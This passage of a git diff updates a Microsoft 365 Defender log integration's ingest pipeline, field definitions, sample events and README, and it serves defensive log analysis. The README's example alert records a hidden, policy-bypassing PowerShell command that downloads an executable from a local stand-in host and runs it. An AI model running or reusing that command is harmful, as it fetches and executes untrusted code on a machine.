"odata_type": "#microsoft.graph.security.userEvidence", "remediation_status": "none", - "userAccount": { - "displayName": "Jens Luffe" - }, "user_account": { "account_name": "user", "azure_ad_user_id": "f149b355-542f-4216-bce3-5347cf02a4aa", + "display_name": "Jens Luffe", "domain_name": "corp.example", "user_principal_name": "user@example.com", "user_sid": "S-1-5-21-3978388234-3821721435-422805698-27297" @@ -1784,12 +1782,10 @@ "created_datetime": "2023-05-12T15:27:46.873Z", "odata_type": "#microsoft.graph.security.userEvidence", "remediation_status": "none", - "userAccount": { - "displayName": "Dennis Uber" - }, "user_account": { "account_name": "user3", "azure_ad_user_id": "6d4c2f48-1d1e-4c8f-8666-914b2085332c", + "display_name": "Dennis Uber", "domain_name": "corp.example", "user_principal_name": "user3@example.com", "user_sid": "S-1-5-21-3978388234-3821721435-422805698-30771" @@ -2035,12 +2031,10 @@ "created_datetime": "2023-05-12T12:14:33.386Z", "odata_type": "#microsoft.graph.security.userEvidence", "remediation_status": "none", - "userAccount": { - "displayName": "Eamon Hess" - }, "user_account": { "account_name": "user4", "azure_ad_user_id": "12145719-f684-456e-b8ba-f2f7c67ada56", + "display_name": "Eamon Hess", "domain_name": "corp.example", "user_principal_name": "user4@example.com", "user_sid": "S-1-5-21-3978388234-3821721435-422805698-3556" diff --git a/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml b/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml index 9bcb25a71f0..8218b8d721f 100644 --- a/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml +++ b/packages/m365_defender/data_stream/incident/elasticsearch/ingest_pipeline/default.yml @@ -1526,6 +1526,15 @@ processors: field: _ingest._value.userAccount.accountName target_field: _ingest._value.user_account.account_name ignore_missing: true + - foreach: + field: json.alerts.evidence + if: ctx.json?.alerts?.evidence instanceof List + ignore_failure: true + processor: + rename: + field: _ingest._value.userAccount.displayName + target_field: _ingest._value.user_account.display_name + ignore_missing: true - foreach: field: json.alerts.evidence if: ctx.json?.alerts?.evidence instanceof List diff --git a/packages/m365_defender/data_stream/incident/fields/fields.yml b/packages/m365_defender/data_stream/incident/fields/fields.yml index 92236604767..c8110974669 100644 --- a/packages/m365_defender/data_stream/incident/fields/fields.yml +++ b/packages/m365_defender/data_stream/incident/fields/fields.yml @@ -207,6 +207,8 @@ - name: object_id type: keyword description: The unique identifier of the application object in Azure AD. + - name: odata_type + type: keyword - name: onboarding_status type: keyword description: 'The status of the machine onboarding to Microsoft Defender for Endpoint.The possible values are: insufficientInfo, onboarded, canBeOnboarded, unsupported, unknownFutureValue.' @@ -389,6 +391,9 @@ - name: azure_ad_user_id type: keyword description: The user object identifier in Azure AD. + - name: display_name + type: keyword + description: The user display name in Azure AD. - name: domain_name type: keyword description: The name of the Active Directory domain of which the user is a member. diff --git a/packages/m365_defender/data_stream/incident/sample_event.json b/packages/m365_defender/data_stream/incident/sample_event.json index efb38dbc66c..03a0156be1a 100644 --- a/packages/m365_defender/data_stream/incident/sample_event.json +++ b/packages/m365_defender/data_stream/incident/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2021-09-30T09:35:45.113Z", "agent": { - "ephemeral_id": "bfa54030-e0ce-4076-86d5-90314cd5425d", - "id": "b749ee7f-378d-45d8-8151-975dfa11ce57", + "ephemeral_id": "b25e1419-d728-4361-8b2c-b147f421b7c9", + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.8.2" + "version": "8.13.0" }, "cloud": { "account": { @@ -24,9 +24,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "b749ee7f-378d-45d8-8151-975dfa11ce57", - "snapshot": false, - "version": "8.8.2" + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", + "snapshot": true, + "version": "8.13.0" }, "event": { "action": [ @@ -36,7 +36,7 @@ "created": "2021-08-13T08:43:35.553Z", "dataset": "m365_defender.incident", "id": "2972395", - "ingested": "2023-07-21T12:35:09Z", + "ingested": "2024-01-17T16:05:30Z", "kind": "alert", "original": "{\"@odata.type\":\"#microsoft.graph.security.incident\",\"alerts\":{\"@odata.type\":\"#microsoft.graph.security.alert\",\"actorDisplayName\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/da637551227677560813_-961444813?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"assignedTo\":null,\"category\":\"DefenseEvasion\",\"classification\":\"unknown\",\"comments\":[],\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"description\":\"A hidden file has been launched. This activity could indicate a compromised host. Attackers often hide files associated with malicious tools to evade file system inspection and defenses.\",\"detectionSource\":\"antivirus\",\"detectorId\":\"e0da400f-affd-43ef-b1d5-afc2eb6f2756\",\"determination\":\"unknown\",\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":null,\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"defenderAvStatus\":\"unknown\",\"deviceDnsName\":\"tempDns\",\"firstSeenDateTime\":\"2020-09-12T07:28:32.4321753Z\",\"healthStatus\":\"active\",\"loggedOnUsers\":[],\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22424,\"osPlatform\":\"Windows10\",\"rbacGroupId\":75,\"rbacGroupName\":\"UnassignedGroup\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"medium\",\"roles\":[\"compromised\"],\"tags\":[\"Test Machine\"],\"verdict\":\"unknown\",\"version\":\"Other\",\"vmMetadata\":{\"cloudProvider\":\"azure\",\"resourceId\":\"/subscriptions/8700d3a3-3bb7-4fbe-a090-488a1ad04161/resourceGroups/WdatpApi-EUS-STG/providers/Microsoft.Compute/virtualMachines/NirLaviTests\",\"subscriptionId\":\"8700d3a3-3bb7-4fbe-a090-488a1ad04161\",\"vmId\":\"ca1b0d41-5a3b-4d95-b48b-f220aed11d78\"}},{\"@odata.type\":\"#microsoft.graph.security.fileEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"fileDetails\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"MsSense.exe\",\"filePath\":\"C:\\\\Program Files\\\\temp\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":6136392,\"issuer\":null,\"sha1\":\"5f1e8acedc065031aad553b710838eb366cfee9a\",\"sha256\":\"8963a19fb992ad9a76576c5638fd68292cffb9aaac29eb8285f9abf6196a7dec\",\"signer\":null},\"mdeDeviceId\":\"73e7e2de709dff64ef64b1d0c30e67fab63279db\",\"parentProcessCreationDateTime\":\"2021-08-12T07:39:09.0909239Z\",\"parentProcessId\":668,\"parentProcessImageFile\":{\"fileName\":\"services.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":731744,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"\\\"MsSense.exe\\\"\",\"processCreationDateTime\":\"2021-08-12T12:43:19.0772577Z\",\"processId\":4780,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"SYSTEM\",\"azureAdUserId\":null,\"domainName\":\"NT AUTHORITY\",\"userPrincipalName\":null,\"userSid\":\"S-1-5-18\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.registryKeyEvidence\",\"createdDateTime\":\"2021-04-27T12:19:27.7211305Z\",\"registryHive\":\"HKEY_LOCAL_MACHINE\",\"registryKey\":\"SYSTEM\\\\CONTROLSET001\\\\CONTROL\\\\WMI\\\\AUTOLOGGER\\\\SENSEAUDITLOGGER\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2021-04-26T07:45:50.116Z\",\"id\":\"da637551227677560813_-961444813\",\"incidentId\":\"28282\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/28282?tid=b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"lastActivityDateTime\":\"2021-05-02T07:56:58.222Z\",\"lastUpdateDateTime\":\"2021-05-02T14:19:01.3266667Z\",\"mitreTechniques\":[\"T1564.001\"],\"providerAlertId\":\"da637551227677560813_-961444813\",\"recommendedActions\":\"Collect artifacts and determine scope\\n�\\tReview the machine timeline for suspicious activities that may have occurred before and after the time of the alert, and record additional related artifacts (files, IPs/URLs) \\n�\\tLook for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\\n�\\tSubmit relevant files for deep analysis and review resulting detailed behavioral information.\\n�\\tSubmit undetected files to the MMPC malware portal\\n\\nInitiate containment \\u0026 mitigation \\n�\\tContact the user to verify intent and initiate local remediation actions as needed.\\n�\\tUpdate AV signatures and run a full scan. The scan might reveal and remove previously-undetected malware components.\\n�\\tEnsure that the machine has the latest security updates. In particular, ensure that you have installed the latest software, web browser, and Operating System versions.\\n�\\tIf credential theft is suspected, reset all relevant users passwords.\\n�\\tBlock communication with relevant URLs or IPs at the organization�s perimeter.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"low\",\"status\":\"new\",\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious execution of hidden file\"},\"assignedTo\":\"KaiC@contoso.onmicrosoft.com\",\"classification\":\"truePositive\",\"comments\":[{\"comment\":\"Demo incident\",\"createdBy\":\"DavidS@contoso.onmicrosoft.com\",\"createdTime\":\"2021-09-30T12:07:37.2756993Z\"}],\"createdDateTime\":\"2021-08-13T08:43:35.5533333Z\",\"determination\":\"multiStagedAttack\",\"displayName\":\"Multi-stage incident involving Initial access \\u0026 Command and control on multiple endpoints reported by multiple sources\",\"id\":\"2972395\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/2972395?tid=12f988bf-16f1-11af-11ab-1d7cd011db47\",\"lastUpdateDateTime\":\"2021-09-30T09:35:45.1133333Z\",\"redirectIncidentId\":null,\"severity\":\"medium\",\"status\":\"active\",\"tags\":[\"Demo\"],\"tenantId\":\"b3c1b5fc-828c-45fa-a1e1-10d74f6d6e9c\"}", "provider": "microsoftDefenderForEndpoint", @@ -327,4 +327,4 @@ } } } -} +} \ No newline at end of file diff --git a/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 0420c416e3c..a771b124284 100644 --- a/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/m365_defender/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -262,6 +262,17 @@ processors: ######################### ## ECS Related Mapping ## ######################### + - convert: + field: json.alerts.entities.ipAddress + type: ip + if: ctx.json?.alerts?.entities?.ipAddress != null + on_failure: + - append: + field: error.message + value: '{{{_ingest.on_failure_message}}}' + - remove: + field: + - json.alerts.entities.ipAddress - append: field: related.ip value: "{{{json.alerts.entities.ipAddress}}}" diff --git a/packages/m365_defender/data_stream/log/sample_event.json b/packages/m365_defender/data_stream/log/sample_event.json index 65b4ca1ad2b..fa4c6ea5ed6 100644 --- a/packages/m365_defender/data_stream/log/sample_event.json +++ b/packages/m365_defender/data_stream/log/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2020-09-06T12:07:55.32Z", "agent": { - "ephemeral_id": "538b61a2-ee8e-4f0f-92b3-874bb25bd07c", - "id": "761cded5-abcb-4ec8-a5e6-f7546489e271", + "ephemeral_id": "75fd76e4-ea58-4f89-92b4-6d1acb0a10bb", + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.7.1" + "version": "8.13.0" }, "cloud": { "provider": "azure" @@ -19,9 +19,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "761cded5-abcb-4ec8-a5e6-f7546489e271", - "snapshot": false, - "version": "8.7.1" + "id": "5aad2f43-374a-4a11-a080-b8039c1ee9a1", + "snapshot": true, + "version": "8.13.0" }, "event": { "action": "InitialAccess", @@ -34,7 +34,7 @@ "duration": 0, "end": "2020-09-06T12:04:00Z", "id": "faf8edc936-85f8-a603-b800-08d8525cf099", - "ingested": "2023-08-08T07:59:58Z", + "ingested": "2024-01-17T16:06:28Z", "kind": "alert", "original": "{\"alerts\":{\"actorName\":null,\"alertId\":\"faf8edc936-85f8-a603-b800-08d8525cf099\",\"assignedTo\":\"Automation\",\"category\":\"InitialAccess\",\"classification\":null,\"creationTime\":\"2020-09-06T12:07:54.3716642Z\",\"description\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.2\",\"detectionSource\":\"OfficeATP\",\"determination\":null,\"devices\":[],\"entities\":{\"aadUserId\":null,\"accountName\":null,\"clusterBy\":null,\"deliveryAction\":null,\"deviceId\":null,\"domainName\":null,\"entityType\":\"MailBox\",\"fileName\":null,\"filePath\":null,\"ipAddress\":null,\"mailboxAddress\":\"testUser3@contoso.com\",\"mailboxDisplayName\":\"test User3\",\"parentProcessCreationTime\":null,\"parentProcessId\":null,\"processCommandLine\":null,\"processCreationTime\":null,\"processId\":null,\"recipient\":null,\"registryHive\":null,\"registryKey\":null,\"registryValue\":null,\"registryValueType\":null,\"securityGroupId\":null,\"securityGroupName\":null,\"sender\":null,\"sha1\":null,\"sha256\":null,\"subject\":null,\"url\":null,\"userPrincipalName\":\"testUser3@contoso.com\",\"userSid\":null},\"firstActivity\":\"2020-09-06T12:04:00Z\",\"incidentId\":924518,\"investigationId\":null,\"investigationState\":\"Queued\",\"lastActivity\":\"2020-09-06T12:04:00Z\",\"lastUpdatedTime\":\"2020-09-06T12:37:40.88Z\",\"mitreTechniques\":[],\"resolvedTime\":null,\"serviceSource\":\"OfficeATP\",\"severity\":\"Informational\",\"status\":\"InProgress\",\"threatFamilyName\":null,\"title\":\"Email reported by user as malware or phish\"},\"assignedTo\":null,\"classification\":\"Unknown\",\"comments\":[],\"createdTime\":\"2020-09-06T12:07:55.1366667Z\",\"determination\":\"NotAvailable\",\"incidentId\":924518,\"incidentName\":\"Email reported by user as malware or phish\",\"lastUpdateTime\":\"2020-09-06T12:07:55.32Z\",\"redirectIncidentId\":null,\"severity\":\"Informational\",\"status\":\"Active\",\"tags\":[]}", "provider": "OfficeATP", @@ -106,4 +106,4 @@ "user": { "name": "testUser3@contoso.com" } -} +} \ No newline at end of file diff --git a/packages/m365_defender/docs/README.md b/packages/m365_defender/docs/README.md index ab8db4d913f..b520e33c2ba 100644 --- a/packages/m365_defender/docs/README.md +++ b/packages/m365_defender/docs/README.md @@ -2,7 +2,7 @@ ## Overview -The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. +The [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender) integration allows you to monitor Alert, Incident (Microsoft Graph Security API) and Event (Streaming API) Logs. Microsoft 365 Defender is a unified pre and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. Use the Microsoft 365 Defender integration to collect and parse data from the Microsoft Azure Event Hub, Microsoft Graph Security v1.0 REST API and Microsoft 365 Defender API. Then visualise that data in Kibana. @@ -10,7 +10,9 @@ For example, you could use the data from this integration to consolidate and cor ## Data streams -The Microsoft 365 Defender integration collects logs for three types of events: Event, Incident and Log. +The Microsoft 365 Defender integration collects logs for four types of events: Alert, Event, Incident and Log. + +**Alert:** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/graph/api/resources/security-alert?view=graph-rest-1.0) to collect alerts including suspicious activities in a customer's tenant that Microsoft or partner security providers have identified and flagged for action. **Event (Recommended):** This data streams leverages the [M365 Defender Streaming API](https://learn.microsoft.com/en-us/microsoft-365/security/defender/streaming-api?view=o365-worldwide) to collect Alert, Device, Email, App and Identity Events. Events are streamed to an Azure Event Hub. For a list of Supported Events exposed by the Streaming API and supported by Elastic's integration, please see Microsoft's documentation [here](https://learn.microsoft.com/en-us/microsoft-365/security/defender/supported-event-types?view=o365-worldwide). @@ -73,6 +75,487 @@ For **Event**, in filebeat [Azure Event Hub](https://www.elastic.co/guide/en/bea ## Logs reference +### alert + +This is the `alert` dataset. + +#### Example + +An example event for `alert` looks as following: + +```json +{ + "@timestamp": "2023-10-20T09:54:07.503Z", + "agent": { + "ephemeral_id": "3e24a8f6-11a3-415f-b6d6-c5188d9239f6", + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.7.1" + }, + "cloud": { + "account": { + "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39" + } + }, + "data_stream": { + "dataset": "m365_defender.alert", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "26c7b361-0790-47aa-b465-a57c5d8ab6b8", + "snapshot": false, + "version": "8.7.1" + }, + "event": { + "action": [ + "detected" + ], + "agent_id_status": "verified", + "category": [ + "host", + "iam", + "network", + "process" + ], + "created": "2023-10-20T09:53:09.883Z", + "dataset": "m365_defender.alert", + "duration": 2478000000, + "end": "2023-10-20T09:51:41.993Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "ingested": "2024-01-29T06:22:16Z", + "kind": "alert", + "original": "{\"actorDisplayName\":null,\"additionalData\":null,\"alertPolicyId\":null,\"alertWebUrl\":\"https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"assignedTo\":null,\"category\":\"Execution\",\"classification\":null,\"comments\":[],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"determination\":null,\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"defenderAvStatus\":\"notSupported\",\"detailedRoles\":[\"PrimaryDevice\"],\"deviceDnsName\":\"clw555test\",\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"healthStatus\":\"inactive\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}],\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"onboardingStatus\":\"onboarded\",\"osBuild\":22621,\"osPlatform\":\"Windows11\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"riskScore\":\"high\",\"roles\":[],\"tags\":[],\"verdict\":\"unknown\",\"version\":\"22H2\",\"vmMetadata\":null},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"url\":\"http://127.0.0.1/1.exe\",\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.ipEvidence\",\"countryLetterCode\":null,\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"ipAddress\":\"127.0.0.1\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"verdict\":\"suspicious\"},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"detailedRoles\":[],\"detectionStatus\":\"detected\",\"imageFile\":{\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":491520,\"issuer\":null,\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"signer\":null},\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"parentProcessId\":5772,\"parentProcessImageFile\":{\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"filePublisher\":\"Microsoft Corporation\",\"fileSize\":323584,\"issuer\":null,\"sha1\":null,\"sha256\":null,\"signer\":null},\"processCommandLine\":\"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe');Start-Process 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"processId\":8224,\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"azureAdUserId\":null,\"displayName\":null,\"domainName\":\"AzureAD\",\"userPrincipalName\":null,\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\"},\"verdict\":\"unknown\"}],\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"incidentWebUrl\":\"https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"mitreTechniques\":[\"T1059.001\"],\"productName\":\"Microsoft Defender for Endpoint\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C\\u0026C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.\",\"resolvedDateTime\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"severity\":\"medium\",\"status\":\"new\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"threatDisplayName\":null,\"threatFamilyName\":null,\"title\":\"Suspicious PowerShell command line\"}", + "provider": "microsoftDefenderForEndpoint", + "severity": 3, + "start": "2023-10-20T09:51:39.515Z", + "type": [ + "info" + ], + "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39" + }, + "host": { + "id": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843" + ], + "ip": [ + "127.0.0.1" + ], + "os": { + "name": [ + "Windows11" + ], + "version": [ + "22H2" + ] + } + }, + "input": { + "type": "httpjson" + }, + "m365_defender": { + "alert": { + "category": "Execution", + "created_datetime": "2023-10-20T09:53:09.883Z", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "detection_source": "microsoftDefenderForEndpoint", + "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "evidence": [ + { + "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "created_datetime": "2023-10-20T09:53:10.193Z", + "defender_av_status": "notSupported", + "detailed_roles": [ + "PrimaryDevice" + ], + "device_dns_name": "clw555test", + "first_seen_datetime": "2023-10-20T09:50:17.738Z", + "health_status": "inactive", + "ip_interfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "logged_on_users": [ + { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD" + } + ], + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.deviceEvidence", + "onboarding_status": "onboarded", + "os_build": "22621", + "os_platform": "Windows11", + "rbac_group": { + "id": "0" + }, + "remediation_status": "none", + "risk_score": "high", + "verdict": "unknown", + "version": "22H2" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.userEvidence", + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.urlEvidence", + "remediation_status": "none", + "url": "http://127.0.0.1/1.exe", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "ip_address": "127.0.0.1", + "odata_type": "#microsoft.graph.security.ipEvidence", + "remediation_status": "none", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "detection_status": "detected", + "image_file": { + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "publisher": "Microsoft Corporation", + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "size": 491520 + }, + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.processEvidence", + "parent_process": { + "creation_datetime": "2023-10-20T09:51:19.506Z", + "id": 5772, + "image_file": { + "name": "cmd.exe", + "path": "C:\\Windows\\System32", + "publisher": "Microsoft Corporation", + "size": 323584 + } + }, + "process": { + "command_line": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "creation_datetime": "2023-10-20T09:51:39.499Z", + "id": 8224 + }, + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + } + ], + "first_activity_datetime": "2023-10-20T09:51:39.515Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incident_id": "23", + "incident_web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/incidents/23", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + }, + "last_activity_datetime": "2023-10-20T09:51:41.993Z", + "last_update_datetime": "2023-10-20T09:54:07.503Z", + "mitre_techniques": [ + "T1059.001" + ], + "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider 